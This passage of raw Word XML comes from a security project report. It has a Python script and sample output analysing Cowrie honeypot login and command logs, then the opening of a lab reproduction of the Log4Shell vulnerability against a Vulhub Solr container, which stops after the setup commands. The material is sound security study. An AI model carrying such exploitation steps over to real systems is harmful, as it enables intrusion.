          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1130A9C8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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE14BB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529E10D1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LOG_FILE = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cowrie.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7F553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078B2B00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events = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD5B2C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with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LOG_FILE, "r") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F54FE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for line in f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C5BFC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line = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>line.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B18B01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if not line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E8D40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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EDB76D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2AF02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5A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>events.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(line))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0420B479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except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>json.JSONDecodeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B84A24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           continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A012C28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5A07D5B8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event_types</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Counter(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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>", "unknown") for e in events)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799ECFDA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5C98E07F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login_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [e for e in events if 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("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>") == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE93D2D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login_failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [e for e in events if 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("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>") == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DCEDC4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739A734F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usernames_tried</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Counter(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"username", "?") for e in (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login_failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07468840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passwords_tried</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Counter(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"password", "?") for e in (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login_failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5BE1E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03BB4797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commands = [e for e in events if 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("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>") == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cowrie.command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6124B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r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command_counter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Counter(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e.get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"input", "?") for e in commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE8A80D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4183EEA3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# Visualization (example: top usernames)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66BCFA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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plt.figure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figsize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8, 5))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CB3E3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labels, counts = zip(*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usernames_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tried.most</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>common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10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3DE90E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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plt.bar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>labels, counts, color="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indianred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04226C8C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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plt.title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("Top Usernames Tried Against Honeypot")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AADBA6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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>plt.savefig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("chart_usernames.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B95043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4.3 Report Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048F5D4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lastRenderedPageBreak/>
        <w:t>The script prints a structured console summary and saves five chart images (chart_event_types.png, chart_usernames.png, chart_passwords.png, chart_commands.png, chart_timeline.png) for inclusion in analysis reports and dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0B978A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Example console output from analysis of the local honeypot dataset (104 total log entries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C15496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Total log entries loaded: 104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D6D4F6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Total connection attempts: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4AC60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Successful logins: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22458B89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Failed logins: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106C422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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA0448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</w:p>
    <w:p w14:paraId="5B9F437C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--- Top Usernames Tried ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECE4E9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root               </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26167199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admin              </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4610C1D7" w14:textId="77777777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test               </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C7CCA" w14:textId="179EEA0D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 xml:space="preserve">ubuntu             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C579696" w14:textId="4D8C0F6C" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Total commands executed: 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A951A8" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64CE54EA" w14:textId="77950E6E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4.4 Execution Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C82DA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Extract the honeypot's JSON log file from its Docker container using docker cp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154C9F9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Run the analysis script against the extracted file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD53B0F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Review console statistics and generated chart images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4793FA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Repeat the same process independently for both the local and cloud honeypot datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404BC75" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE97CB" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00FA7585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FA7585">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Vulnerability Assessment &amp; Penetration Testing (Log4Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824C043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6ED1FE91" w14:textId="27AE6350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5.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FE6E2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To demonstrate that the categories of attack technique observed on the honeypot correspond to real, exploitable weaknesses in production software, this project reproduces CVE-2021-44228 ("Log4Shell"), a critical (CVSS 10.0) remote code execution vulnerability in the Apache Log4j logging library, disclosed in December 2021. The vulnerability was reproduced against a deliberately vulnerable Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.11.0 instance (bundling the affected Log4j 2.14.1 library), deployed using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> project's pre-configured Docker environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03077A26" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E9164A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5.2 Exploitation Steps and Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408D27A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Step 1 — Deploy the vulnerable environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391D728C" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP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 xml:space="preserve">cd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vulhub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/log4j/CVE-2021-44228</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BAFFD" w14:textId="39C03782" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP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>docker compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6BA05A" w14:textId="6FF2BDE3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Step 2 — Start a listener to detect a successful callback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10C06A" w14:textId="53066DFA" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:rPr>
